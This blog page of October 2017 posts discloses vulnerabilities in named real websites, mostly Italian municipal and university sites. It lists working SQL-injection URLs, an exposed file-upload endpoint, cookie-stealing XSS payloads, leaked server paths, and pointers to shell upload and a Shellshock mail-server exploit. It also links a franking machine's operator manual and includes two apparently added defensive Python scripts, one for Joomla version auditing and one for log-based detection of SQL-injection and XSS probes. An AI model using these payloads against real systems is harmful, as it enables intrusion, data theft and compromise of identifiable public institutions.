
Showing posts from October, 2017

http://www.comuneguardiasanframondi.gov.it | SQL Injection, file/shell upload, system compromise

Joomla com_fabrik vulnerabilities

Raising the error related to the SQL injection:
http://www.comuneguardiasanframondi.gov.it//index.php?option=com_fabrik&view=table&tableid=13+union+select+1----

archived: http://archive.is/1Up6B

Upload vulnerability
http://www.comuneguardiasanframondi.gov.it/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0
archived: http://archive.is/6XtTl

Path (leaked from the error messages):
/web/htdocs/www.comuneguardiasanframondi.gov.it/

Poste Italiane - Affrancatrice Polivalente PT100SV (multipurpose franking machine, Elettronica Meccanica Sistemi S.P.A.) - operator's manual

PT100SV Software Manual, Release A8C6

Download the manual here

Mirrors:
filefactory.com: http://www.filefactory.com/file/1u1o3fex14vt/pt100sv-manuale-operatore_MultiUpload.biz.pdf
share-online.biz: http://www.share-online.biz/dl/GRQZM4YOUSV
sendmyway.com: https://www.sendmyway.com/bgktennfvwqz
gigapeta.com: http://gigapeta.com/dl/7495857a6745dc

http://lesim1.ing.unisannio.it | path disclosure, xss, sql injections, shell upload

http://lesim1.ing.unisannio.it

We can start by detecting the version manually (automated tools such as joomscan give random values) from
http://lesim1.ing.unisannio.it/configuration.php-dist
which reveals 1.5.x
archived: http://archive.is/VB6I3

libraries/joomla/crypt/index.html is missing, so it's probably before Joomla! 1.5.26.
components/com_mailto/helpers/index.html is missing, so it's probably before Joomla! 1.5.23.
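A defender auditing their own Joomla! 1.5 installs can turn the marker-file check above into a script. This is an added example, not code from the original post: the two marker paths and the releases that introduced them (1.5.26 and 1.5.23) are taken from the post as stated, the audit_joomla and audit_sample names and the temporary webroot are constructed here, and configuration.php-dist is flagged because the post shows it leaking the version line.

```python
"""Bound a Joomla! 1.5.x install's version from marker files on disk.

Added example, not from the original post. The two marker files and the
releases that introduced them are the ones stated in the post; the webroot
layout used for the demo is constructed in a temporary directory.
"""
import os
import tempfile

# (relative path, first 1.5.x release that ships it), as stated in the post
MARKERS = [
    ("libraries/joomla/crypt/index.html", "1.5.26"),
    ("components/com_mailto/helpers/index.html", "1.5.23"),
]

# Leftover install files that leak the version line to anyone who requests them
LEAKY_FILES = ["configuration.php-dist"]


def version_tuple(v):
    """'1.5.23' -> (1, 5, 23) so versions compare numerically."""
    return tuple(int(x) for x in v.split("."))


def audit_joomla(webroot):
    """Return (upper_bound, leaky) for a Joomla! 1.5.x webroot.

    upper_bound is the lowest release whose marker file is absent (the install
    predates it), or None when every marker is present; leaky lists leftover
    files that should not be reachable from the web.
    """
    missing = [ver for rel, ver in MARKERS
               if not os.path.exists(os.path.join(webroot, rel))]
    upper_bound = min(missing, key=version_tuple) if missing else None
    leaky = [f for f in LEAKY_FILES if os.path.exists(os.path.join(webroot, f))]
    return upper_bound, leaky


def audit_sample(present):
    """Build a constructed webroot containing only `present` and audit it."""
    with tempfile.TemporaryDirectory() as root:
        for rel in present:
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            open(full, "w").close()
        return audit_joomla(root)


if __name__ == "__main__":
    # Mirrors the install in the post: both markers missing and
    # configuration.php-dist still reachable -> ('1.5.23', ['configuration.php-dist'])
    print(audit_sample(["configuration.php-dist"]))
```

Running it against a real webroot is just audit_joomla("/path/to/joomla"); the point of the min() over missing markers is that the tightest statement you can make is "older than the lowest release whose file is absent", not a list of every bound.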

(Tip: I just used file and folder comparison with Beyond Compare, but you can also use Meld on Linux)

To get the path we try to raise errors with malformed SQL queries. In this case we are abusing the weblinks component and adding the filter_order parameter, even though the site uses SEF URLs (who cares).

http://lesim1.ing.unisannio.it/index.php/it/link-mee/53-gruppi-di-ricerca-mee-delle-universita-italiane-?&filter_order=

to get an output like this:
No valid database connection Unknown column '0' in 'order clause' SQL=SELECT * FROM jos_weblinks WHERE catid = 53 AND p…

http://www.orientamento.unisannio.it | path disclosure, xss, sql injections, shell upload, system compromise

http://www.orientamento.unisannio.it
The website uses PHP-Nuke with some customizations (sometimes it detects that we are trying to abuse specific bugs).

We can find the path from the Deprecated notices in various modules:
/var/www/html/copus/home/copus/modules/

ex.: http://www.orientamento.unisannio.it/modules.php?name=Stories_Archive
Deprecated: Function ereg() is deprecated in /var/www/html/copus/home/copus/modules/Stories_Archive/index.php on line 25

register_globals seems to be On, so variables can be overridden via POST/GET requests.

Supposed version: PHP-Nuke <= 6.9, since banners.php exists.

In banners.php we have:

switch($op) { ... }

Sample:
http://www.orientamento.unisannio.it/banners.php?op=login

By using, for example, this URL:
http://www.orientamento.unisannio.it/banners.php?op=Ok&login=[Sqlinjection]&pass=abc
the SQL is executed and we can dump data instead of the banners.

File via SQL:
http://www.orientamento.unisannio.it/banners.php?op=Ok&login='…

cineca.it | XSS

http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=[XSS]&btnSubmit=Cerca

ex.:
http://accordi-internazionali.cineca.it/accordi.php?continenti=%&paesi=%&univ_stran=%&univ_ita=C4&anni=<script>alert(document.cookie);</script>&btnSubmit=Cerca

archived with sample javascript text: http://archive.is/To5A4

http://www.carminevalentino.it/ | xss

http://www.carminevalentino.it/

The path can be seen in the 404 error pages:
D:\inetpub\webs\carminevalentinoit\

XSS

http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg[XSS]&pg=1
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);alert(%22xss;&pg=1

With the same injection we can embed any video in the page content.

Example:
http://www.carminevalentino.it/index.asp?http_request=video&act=read&arg=%22);s1.addVariable(%22file%22,%22http://flashedu.rai.it/raistoria/RES/16_06_1977.mp4%22);//&pg=1

Shortened URL: https://goo.gl/sWhg1P
Archived URL: http://archive.is/25Bw8

http://www.tourism-solutions.tech/ | xss - system compromise

http://www.tourism-solutions.tech regularly sends spam emails.

There's a fake unsubscribe script that reports the removal of whatever you submit, even a simple XSS payload.

http://www.tourism-solutions.tech/unscribe.php?id=%3Cscript%3Ealert('xss');%3C/script%3Eyourmail.com
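As a defender-side counterpart to the probes shown in these posts (the com_fabrik UNION injection, the reflected XSS in accordi.php, index.asp and unscribe.php), here is a small Apache access-log scanner. This is an added example, not code from the original posts: the log lines are constructed to mirror the request shapes on the page, the SIGNATURES table and the classify/scan names are my own, and the signatures are deliberately coarse (they are meant to surface probes for triage, not to replace a WAF).

```python
"""Flag SQL-injection and XSS probes of the kind shown in these posts in an
Apache access log.

Added example, not part of the original posts. The log lines are constructed
and only mirror the request shapes on the page; IPs are RFC 5737 documentation
addresses and the vhost is omitted.
"""
import re
from urllib.parse import unquote_plus

# Apache "combined" format: ip ident user [ts] "METHOD url PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Coarse signatures, applied to the URL after decoding
SIGNATURES = {
    "sqli": re.compile(r"union\s+(all\s+)?select|'\s*(or|and)\s|--\s*$", re.I),
    "xss": re.compile(r"<\s*script|\bon\w+\s*=|alert\s*\(", re.I),
}


def decode(url):
    """Decode twice: double-encoded payloads are a classic way past naive filters."""
    return unquote_plus(unquote_plus(url))


def classify(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode(m.group("url"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "url": m.group("url"), "decoded": decoded, "hits": hits}


def scan(lines):
    """Run classify over an iterable of log lines, keeping only findings."""
    return [f for f in (classify(l) for l in lines) if f]


# Constructed sample: one SQLi probe (500 from the broken query), one benign
# request, one reflected-XSS probe, and one double-encoded XSS probe.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Oct/2017:10:01:02 +0200] "GET /index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- HTTP/1.1" 500 2310 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Oct/2017:10:01:09 +0200] "GET /index.php/it/link-mee/53-gruppi-di-ricerca HTTP/1.1" 200 8190 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Oct/2017:10:02:41 +0200] "GET /accordi.php?continenti=%25&anni=%3Cscript%3Ealert(document.cookie);%3C/script%3E&btnSubmit=Cerca HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Oct/2017:10:03:15 +0200] "GET /index.asp?http_request=video&act=read&arg=%2522%2529%253Balert%2528%2522xss&pg=1 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["status"], f["hits"], f["decoded"])
```

The status code is kept in each finding on purpose: a SQLi probe that draws a 500 (as the com_fabrik request above does) is worth more attention than one answered with 200, because it means the injected text reached the database layer, and the same 500 pages are where the filesystem path leaks out.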

____

The mail server can be exploited with an old remote exploit for Postfix on Debian Linux (Shellshock).